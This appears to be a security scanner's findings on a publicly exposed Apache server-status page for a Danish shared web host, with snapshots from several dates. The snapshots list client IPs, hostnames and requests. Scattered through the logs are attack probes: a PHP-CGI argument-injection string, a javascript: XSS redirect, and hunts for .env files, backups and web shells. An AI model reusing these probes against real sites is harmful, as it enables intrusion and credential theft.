34.172.20.172webhotel5.webhosting.dkPOST /loadfile.lp?pageid=Configure HTTP/1.0 48-5-0/0/100. 0.11441710.00.000.66 34.172.20.172webhotel5.webhosting.dkBatch=true&xredirect=javascript:alert(document.domain) HTTP/1.0 49-5-0/0/100. 0.134417110.00.000.02 34.172.20.172webhotel5.webhosting.dkmn6di7nisf0z1wcidxp8bwh9.i-sh.detectors-testing.com%7d HTTP/1.0 50-5-0/0/50. 0.12441700.00.000.01 34.172.20.172we
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3907dbee0
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 01-Nov-2024 07:17:35 CET Restart Time: Friday, 01-Nov-2024 07:00:05 CET Parent Server Generation: 0 Server uptime: 17 minutes 30 seconds Total accesses: 1058 - Total Traffic: 336 kB CPU Usage: u1.59 s.7 cu0 cs0 - .218% CPU load 1.01 requests/sec - 327 B/second - 325 B/request 1 requests currently being processed, 34 idle workers _____________________________W_____............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-079270/32/32_ 0.075820.00.020.02 81.19.232.100webhotel5.webhosting.dkGET /server-status HTTP/1.0 1-079280/30/30_ 0.067060.00.010.01 176.111.174.153webhotel5.webhosting.dkGET / HTTP/1.0 2-079290/30/30_ 0.075400.00.010.01 20.171.206.7webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 3-079300/31/31_ 0.071600.00.010.01 104.234.141.30webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 4-079310/31/31_ 0.055300.00.010.01 104.234.141.30webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-079320/30/30_ 0.078300.00.010.01 47.128.37.33webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 6-079330/31/31_ 0.08000.00.010.01 178.128.207.138webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 7-079340/31/31_ 0.09000.00.010.01 178.128.207.138webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-079350/31/31_ 0.055110.00.010.01 94.130.237.182www.valloe.orgGET /blues/jh0708.htm HTTP/1.0 9-079360/31/31_ 0.044400.00.010.01 172.109.143.70webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 10-079370/30/30_ 0.064000.00.010.01 81.19.232.105www.brandstation.infoGET / HTTP/1.0 11-079380/31/31_ 0.082650.00.010.01 176.111.174.153webhotel5.webhosting.dkGET / HTTP/1.0 12-079390/31/31_ 0.062660.00.010.01 20.171.206.47webhotel5.webhosting.dkGET / HTTP/1.0 13-079400/31/31_ 0.081900.00.010.01 203.221.138.202webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-079410/31/31_ 0.08060.00.010.01 178.128.207.138webhotel5.webhosting.dkGET / HTTP/1.0 15-079420/31/31_ 0.06000.00.010.01 178.128.207.138webhotel5.webhosting.dkGET /about HTTP/1.0 16-079430/30/30_ 0.056110.00.010.01 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 17-079440/31/31_ 0.10000.00.010.01 178.128.207.138webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 18-079450/30/30_ 0.058400.00.010.01 5.255.231.18webhotel5.webhosting.dkGET /en/gallery/detail/MM2060-5151 HTTP/1.0 19-079460/30/30_ 0.067700.00.010.01 87.250.224.222webhotel5.webhosting.dkGET /en/film/detail/Vice-Squad-16770 HTTP/1.0 20-079610/30/30_ 0.084350.00.010.01 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 21-079770/30/30_ 0.093800.00.010.01 81.19.232.105www.brandstation.infoGET / HTTP/1.0 22-079780/30/30_ 0.062600.00.010.01 103.212.98.210webhotel5.webhosting.dkGET /admin.php?m=classify&a=edit_save HTTP/1.0 23-079980/30/30_ 0.07000.00.020.02 178.128.207.138webhotel5.webhosting.dkGET /server HTTP/1.0 24-079990/30/30_ 0.060910.00.010.01 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 25-080000/30/30_ 0.06150.00.010.01 178.128.207.138webhotel5.webhosting.dkGET / HTTP/1.0 26-080010/30/30_ 0.0611100.00.010.01 94.130.237.182www.valloe.orgGET /blues/jh0709.htm HTTP/1.0 27-080260/30/30_ 0.05020.00.010.01 178.128.207.138webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 28-080270/30/30_ 0.07000.00.010.01 178.128.207.138webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 29-080280/29/29W 0.07000.00.010.01 178.128.207.138webhotel5.webhosting.dkGET /server-status HTTP/1.0 30-080290/29/29_ 0.0792100.00.010.01 194.67.207.9webhotel5.webhosting.dkHEAD / HTTP/1.0 31-080310/29/29_ 0.059120.00.010.01 94.130.237.182www.valloe.orgGET /blues/jh0707.htm HTTP/1.0 32-080320/29/29_ 0.058610.00.010.01 194.36.174.90webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 33-080330/29/29_ 0.068500.00.010.01 45.26.207.86webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 34-080340/29/29_ 0.068300.00.010.01 5.255.231.202webhotel5.webhosting.dkGET /film/detaljer/Deviant-Perversions-14308 HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde35a67d32c
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Wednesday, 30-Oct-2024 14:26:54 CET Restart Time: Wednesday, 30-Oct-2024 06:05:04 CET Parent Server Generation: 8 Server uptime: 8 hours 21 minutes 50 seconds Total accesses: 57948 - Total Traffic: 22.2 MB CPU Usage: u1.66 s.9 cu0 cs0 - .0085% CPU load 1.92 requests/sec - 772 B/second - 401 B/request 1 requests currently being processed, 30 idle workers ________W____________________.__................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-8294400/37/1592_ 0.031000.00.012.59 37.120.207.164webhotel5.webhosting.dkGET /wp-content/plugins/ango/sett.php HTTP/1.0 1-8295130/37/1547_ 0.03100.00.010.60 37.120.207.164webhotel5.webhosting.dkGET /wp-2022.php HTTP/1.0 2-8294870/37/1570_ 0.04300.00.010.52 146.190.63.248webhotel5.webhosting.dkGET /server HTTP/1.0 3-8295160/37/1617_ 0.03100.00.010.51 81.19.232.105www.mementomedia.dkGET /.env.example HTTP/1.0 4-8295830/37/1539_ 0.05100.00.010.54 146.190.63.248webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 5-8295890/37/1559_ 0.05000.00.010.63 37.120.207.164webhotel5.webhosting.dkGET /wp-2018.php HTTP/1.0 6-8294890/38/1608_ 0.05200.00.010.62 92.204.144.53www.mementomedia.dkGET /.env HTTP/1.0 7-8294280/37/1562_ 0.041200.00.010.52 37.120.207.164webhotel5.webhosting.dkT /wp-content/plugins/background-image-cropper/ups.php HTTP/1.0 8-8298950/35/1530W 0.04000.00.010.42 146.190.63.248webhotel5.webhosting.dkGET /server-status HTTP/1.0 9-8298850/35/1446_ 0.03100.00.010.43 81.19.232.105www.mementomedia.dkGET /blog/.env HTTP/1.0 10-8294900/37/1522_ 0.04200.00.010.50 146.190.63.248webhotel5.webhosting.dkGET /about HTTP/1.0 11-8296210/36/1464_ 0.03600.00.010.43 37.120.207.164webhotel5.webhosting.dk/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.0 12-8295170/37/1493_ 0.05100.00.010.45 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 13-8295900/36/1470_ 0.03000.00.010.47 146.190.63.248webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 14-8295910/36/1492_ 0.04000.00.010.56 92.204.144.53www.mementomedia.dkGET /api/.env HTTP/1.0 15-8296200/36/1463_ 0.06600.00.010.47 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-8296220/36/1461_ 0.05900.00.010.45 37.120.207.164webhotel5.webhosting.dkGET /sellex.php HTTP/1.0 17-8296320/36/1516_ 0.03500.00.010.48 37.120.207.164webhotel5.webhosting.dkGET /wp-content/upgrade-functions.php HTTP/1.0 18-8296330/36/1480_ 0.03460.00.010.44 146.190.63.248webhotel5.webhosting.dkGET / HTTP/1.0 19-8296340/36/1422_ 0.03400.00.010.45 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 20-8297700/36/1402_ 0.04400.00.010.48 37.120.207.164webhotel5.webhosting.dkGET /wp-2021.php HTTP/1.0 21-8298060/35/1416_ 0.052100.00.010.44 81.19.232.105www.mementomedia.dkGET /.env HTTP/1.0 22-8298070/36/1468_ 0.04100.00.010.48 146.190.63.248webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 23-8298960/37/1352_ 0.041300.00.011.24 37.120.207.164webhotel5.webhosting.dkGET /wp-content/updates.php HTTP/1.0 24-8303930/32/1404_ 0.04000.00.010.46 92.204.144.53www.mementomedia.dkGET /blog/.env HTTP/1.0 25-8319450/9/1335_ 0.00300.00.000.45 146.190.63.248webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 26-8320620/7/1282_ 0.00110.00.000.75 92.204.144.53www.mementomedia.dkGET /.env.example HTTP/1.0 27-8320780/7/1370_ 0.00000.00.000.43 81.19.232.105www.mementomedia.dkGET /api/.env HTTP/1.0 28-8320790/7/1282_ 0.00000.00.010.47 104.168.173.24webhotel5.webhosting.dkGET /user/password?name=bzrzzkxkemc HTTP/1.0 29-8-0/0/1327. 0.0511300.00.000.37 104.197.191.16webhotel5.webhosting.dkGET /wp-content/plugins/password-protected/readme.txt HTTP/1.0 30-8293750/38/1262_ 0.04400.00.010.38 146.190.63.248webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 31-8294410/37/1186_ 0.041020.00.010.34 146.190.63.248webhotel5.webhosting.dkGET / HTTP/1.0 32-8-0/0/1113. 0.04115100.00.000.34 34.28.253.183webhotel5.webhosting.dkGET /test.php/_profiler/empty/search/results?limit=10 HTTP/1.0 33-8-0/0/1042. 0.05116800.00.000.37 34.28.253.183webhotel5.webhosting.dkGET /mail/logs/sendmail.log HTTP/1.0 34-8-0/0/1022. 0.04113800.00.000.36 34.28.253.183webhotel5.webhosting.dkGET /backup_3.jar HTTP/1.0 35-8-0/0/922. 0.05113000.00.000.36 34.28.253.183webhotel5.webhosting.dkGET /backup_4.sql.tar.gz HTTP/1.0 36-8-0/0/857. 0.04113500.00.000.40 34.28.253.183webhotel5.webhosting.dkGET /backup_3.sql.tar.z HTTP/1.0 37-8-0/0/840. 0.0648200.00.000.30 138.199.19.178webhotel5.webhosting.dkGET /dropdown.php?p= HTTP/1.0 38-8-0/0/739. 0.0548300.00.000.20 138.199.19.178webhotel5.webhosting.dkGET /wp-content/plugins/azra-tn/wso.php HTTP/1.0 39-8-0/0/637. 0.0548500.00.000.18 138.199.19.178webhotel5.webhosting.dkGET /wp-includes/images/smilies/about.php HTTP/1.0 40-7-0/0/574. 0.06283300.00.000.19 52.169.218.55webhotel5.webhosting.dkGET /wp-includes/function.php HTTP/1.0 41-7-0/0/524. 0.05283300.00.000.14 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/404.php HTTP/1.0 42-7-0/0/477. 0.05283400.00.000.14 52.169.218.55webhotel5.webhosting.dkGET /.well-known/index.php HTTP/1.0 43-7-0/0/474. 0.04283400.00.000.13 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/file.php HTTP/1.0 44-7-0/0/424. 0.04283300.00.000.11 52.169.218.55webhotel5.webhosting.dkGET /wp-admin/themes.php HTTP/1.0 45-7-0/0/373. 0.05283400.00.000.11 52.169.218.55webhotel5.webhosting.dkGET /admin/upload/css.php HTTP/1.0 46-7-0/0/203. 0.04283400.00.000.06 52.169.218.55webhotel5.webhosting.dkGET /wp-content/dropdown.php HTTP/1.0 47-7-0/0/166. 0.05283400.00.000.04 52.169.218.55webhotel5.webhosting.dkGET /wp-includes/404.php HTTP/1.0 48-7-0/0/116. 0.05283400.00.000.03 52.169.218.55webhotel5.webhosting.dkGET /wp-content/themes.php HTTP/1.0 49-7-0/0/116. 0.05283300.00.000.03 52.169.218.55webhotel5.webhosting.dkGET /cgi-bin/index.php HTTP/1.0 50-7-0/0/116. <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde307e890ae
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 26-Oct-2024 14:01:06 CEST Restart Time: Saturday, 26-Oct-2024 06:10:08 CEST Parent Server Generation: 8 Server uptime: 7 hours 50 minutes 58 seconds Total accesses: 46112 - Total Traffic: 27.9 MB CPU Usage: u.89 s.46 cu0 cs0 - .00478% CPU load 1.63 requests/sec - 1034 B/second - 634 B/request 1 requests currently being processed, 29 idle workers ___________________________...W_._.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-834710/5/1420_ 0.013110.00.000.73 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-834720/2/1411_ 0.038140.00.000.62 147.185.132.90webhotel5.webhosting.dkGET / HTTP/1.0 2-834780/2/1409_ 0.00170.00.000.88 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 3-834740/3/1408_ 0.002320.00.000.59 114.119.143.172webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 4-834730/2/1409_ 0.0023100.00.000.59 43.155.183.138webhotel5.webhosting.dkGET / HTTP/1.0 5-834860/1/1395_ 0.004220.00.002.16 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-834750/3/1398_ 0.002200.00.001.32 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 7-834880/1/1390_ 0.003410.00.001.43 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 8-834790/2/1390_ 0.01510.00.000.64 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-834810/2/1388_ 0.00050.00.000.69 188.166.108.93webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-834820/1/1390_ 0.004320.00.000.63 212.112.154.23webhotel5.webhosting.dkGET /metodeogteknik/macgenealogi.html HTTP/1.0 11-834760/2/1318_ 0.01010.00.000.50 188.166.108.93webhotel5.webhosting.dkGET /server HTTP/1.0 12-834850/1/1310_ 0.004360.00.000.91 212.112.154.23webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 13-834770/2/1302_ 0.01010.00.000.77 188.166.108.93webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 14-834870/1/1297_ 0.004110.00.000.74 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 15-834890/1/1251_ 0.00321510.00.000.56 43.142.179.19webhotel5.webhosting.dkGET / HTTP/1.0 16-834900/1/1245_ 0.0031120.00.000.53 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 17-835000/1/1223_ 0.002210.00.000.52 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 18-835030/1/1279_ 0.01191500.00.000.67 69.162.124.228webhotel5.webhosting.dkHEAD / HTTP/1.0 19-835070/1/1287_ 0.001840.00.000.61 20.236.249.81webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 20-835090/1/1221_ 0.00990.00.000.49 66.249.70.39www.tutak.dk /volga/volga/volga2/slides/026%20Politieskorte_t.html HTTP/1.0 21-835110/1/1281_ 0.00210.00.000.61 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 22-835200/1/1252_ 0.001100.00.002.53 188.166.108.93webhotel5.webhosting.dkGET / HTTP/1.0 23-835210/1/1242_ 0.00010.00.000.52 188.166.108.93webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 24-835440/1/1247_ 0.00030.00.000.55 188.166.108.93webhotel5.webhosting.dkGET /about HTTP/1.0 25-835660/1/1207_ 0.00010.00.000.58 188.166.108.93webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 26-836030/1/1210_ 0.00020.00.000.57 188.166.108.93webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 27-7-0/0/1163. 0.111299110.00.000.62 205.210.31.91webhotel5.webhosting.dkGET / HTTP/1.0 28-7-0/0/1069. 0.10129900.00.000.45 149.88.101.15webhotel5.webhosting.dkGET /TNT.php HTTP/1.0 29-7-0/0/1057. 0.10129800.00.000.45 146.70.102.188webhotel5.webhosting.dkGET /vendor/ HTTP/1.0 30-834800/1/1032W 0.00000.00.000.45 188.166.108.93webhotel5.webhosting.dkGET /server-status HTTP/1.0 31-834830/1/1081_ 0.004310.00.000.68 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 32-7-0/0/969. 0.09129800.00.000.40 149.88.101.15webhotel5.webhosting.dkGET /bak.php HTTP/1.0 33-834840/1/823_ 0.004310.00.000.30 212.112.154.23webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 34-7-0/0/715. 0.095700.00.001.43 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 35-7-0/0/641. 0.085700.00.000.28 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 36-7-0/0/591. 0.085700.00.000.27 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 37-7-0/0/539. 0.085700.00.000.26 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-7-0/0/344. 0.105700.00.000.14 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 39-6-0/0/244. 0.05365400.00.000.07 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-6-0/0/45. 0.05365400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-6-0/0/45. 0.06365400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 42-6-0/0/45. 0.04365400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 43-6-0/0/45. 0.05365400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-6-0/0/21. 0.05365400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-6-0/0/21. 0.05365400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 46-6-0/0/21. 0.06365400.00.000.01 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 47-6-0/0/21. 0.03365400.00.000.02 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde360587eee
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 24-Oct-2024 12:05:14 CEST Restart Time: Thursday, 24-Oct-2024 06:05:04 CEST Parent Server Generation: 6 Server uptime: 6 hours 10 seconds Total accesses: 20399 - Total Traffic: 16.0 MB CPU Usage: u4.12 s2.21 cu0 cs0 - .0293% CPU load .944 requests/sec - 778 B/second - 824 B/request 1 requests currently being processed, 33 idle workers ________________W_________________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-6329480/29/581_ 0.065300.00.010.30 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 1-6329490/36/589_ 0.07000.00.010.57 157.230.19.140webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 2-6329500/29/578_ 0.064600.00.010.82 81.19.232.105www.brandstation.infoGET /wp-json/wp/v2/users HTTP/1.0 3-6329520/29/570_ 0.074300.00.010.40 81.19.232.105www.brandstation.infoGET /RDWeb/Pages/en-US/login.aspx HTTP/1.0 4-6329530/29/569_ 0.064100.00.090.43 90.243.51.62webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 5-6329540/29/568_ 0.073600.00.010.69 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 6-6329550/29/567_ 0.064570.00.010.27 193.106.58.174webhotel5.webhosting.dkGET / HTTP/1.0 7-6329560/29/565_ 0.053920.00.010.28 81.19.232.89webhotel5.webhosting.dkGET / HTTP/1.0 8-6329570/29/565_ 0.063610.00.010.39 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 9-6329580/29/565_ 0.061600.00.010.25 54.36.148.205webhotel5.webhosting.dkGET /drops-nepal/755-nepal-lys-beige.html HTTP/1.0 10-6329590/29/564_ 0.063880.00.010.48 93.158.91.251webhotel5.webhosting.dkGET / HTTP/1.0 11-6329600/29/530_ 0.113600.00.030.26 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 12-6329610/29/561_ 0.062160.00.010.30 136.243.220.214webhotel5.webhosting.dkGET / HTTP/1.0 13-6329620/29/562_ 0.051200.00.010.26 81.19.232.105www.brandstation.infoGET /wp-json/wp/v2/users HTTP/1.0 14-6329630/29/561_ 0.070100.00.010.35 157.230.19.140webhotel5.webhosting.dkGET / HTTP/1.0 15-6329640/29/552_ 0.071190.00.011.60 157.230.19.140webhotel5.webhosting.dkGET / HTTP/1.0 16-6329650/28/544W 0.04000.00.010.31 157.230.19.140webhotel5.webhosting.dkGET /server-status HTTP/1.0 17-6329660/29/546_ 0.06010.00.010.25 157.230.19.140webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 18-6329670/29/542_ 0.05000.00.010.34 157.230.19.140webhotel5.webhosting.dkGET /server HTTP/1.0 19-6329680/29/538_ 0.06000.00.010.30 157.230.19.140webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 20-6329770/28/525_ 0.063000.00.010.38 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 21-6330000/27/522_ 0.056010.00.010.35 185.191.171.15webhotel5.webhosting.dkGET /virksomheder/julefrokost HTTP/1.0 22-6330110/27/551_ 0.068570.00.010.27 199.244.88.228www.cskou.dkGET / HTTP/1.0 23-6330230/26/520_ 0.064700.00.010.20 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 24-6330430/26/498_ 0.052800.00.010.34 213.180.203.175webhotel5.webhosting.dkGET /en/film/detail/Tess-and-the-monk-3186 HTTP/1.0 25-6330580/25/507_ 0.046020.00.010.49 85.208.96.195webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 26-6330730/25/468_ 0.053810.00.010.85 93.158.91.235webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 27-6331120/25/468_ 0.054550.00.010.28 81.19.232.105www.kbw.dkGET /sitemaps.xml HTTP/1.0 28-6331350/24/479_ 0.045470.00.010.63 136.143.177.50webhotel5.webhosting.dkGET / HTTP/1.0 29-6331540/24/457_ 0.043600.00.010.85 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 30-6335900/18/452_ 0.023600.00.000.56 89.248.163.208webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 31-6341790/3/388_ 0.01000.00.000.16 157.230.19.140webhotel5.webhosting.dkGET /about HTTP/1.0 32-6341850/3/381_ 0.00000.00.000.16 157.230.19.140webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-6341860/3/334_ 0.00000.00.000.16 157.230.19.140webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 34-5-0/0/231. 0.1138200.00.000.26 89.37.173.32webhotel5.webhosting.dkGET /update/403.php HTTP/1.0 35-5-0/0/181. 0.1638100.00.000.10 89.37.173.32webhotel5.webhosting.dkGET /wp-admin/images/cloud.php HTTP/1.0 36-5-0/0/181. 0.1438200.00.000.09 89.37.173.32webhotel5.webhosting.dkGET /wp-content/plugins/wp-theme-editor/l.php HTTP/1.0 37-5-0/0/181. 0.1136800.00.000.08 89.37.173.32webhotel5.webhosting.dkGET /.well-known/pki-validation/install.php HTTP/1.0 38-5-0/0/131. 0.1336800.00.000.04 89.37.173.32webhotel5.webhosting.dkGET /content.php HTTP/1.0 39-5-0/0/81. 0.1136800.00.000.03 89.37.173.32webhotel5.webhosting.dkGET /wp-content/plugins/dzs-zoomsounds/coder.php HTTP/1.0 40-5-0/0/69. 0.1436800.00.000.12 89.37.173.32webhotel5.webhosting.dkGET /error.php HTTP/1.0 41-5-0/0/69. 0.1236800.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /n.php HTTP/1.0 42-5-0/0/69. 0.1436800.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /wp-includes/Text/ HTTP/1.0 43-5-0/0/69. 0.1136700.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /rumb.php HTTP/1.0 44-5-0/0/69. 0.1336700.00.000.08 89.37.173.32webhotel5.webhosting.dkGET /wp-includes/assets/index.php HTTP/1.0 45-5-0/0/68. 0.1436700.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /wp-includes/IXR/plugins.php HTTP/1.0 46-5-0/0/69. 0.1336700.00.000.06 89.37.173.32webhotel5.webhosting.dkGET /wp-includes/certificates/index.php HTTP/1.0 47-5-0/0/69. 0.1536700.00.000.03 89.37.173.32webhotel5.webhosting.dkGET /.well-known/pki-validation/cloud.php HTTP/1.0 48-5-0/0/69. 0.1236600.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /wp-conflg.php HTTP/1.0 49-5-0/0/69. 0.1336700.00.000.02 89.37.173.32webhotel5.webhosting.dkGET /wp-admin/css/colors/blue/lock.php HTTP/1.0 50-5-0/0/69. 0.1136600.00.000.02 89.37.173.32
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3dff748ca
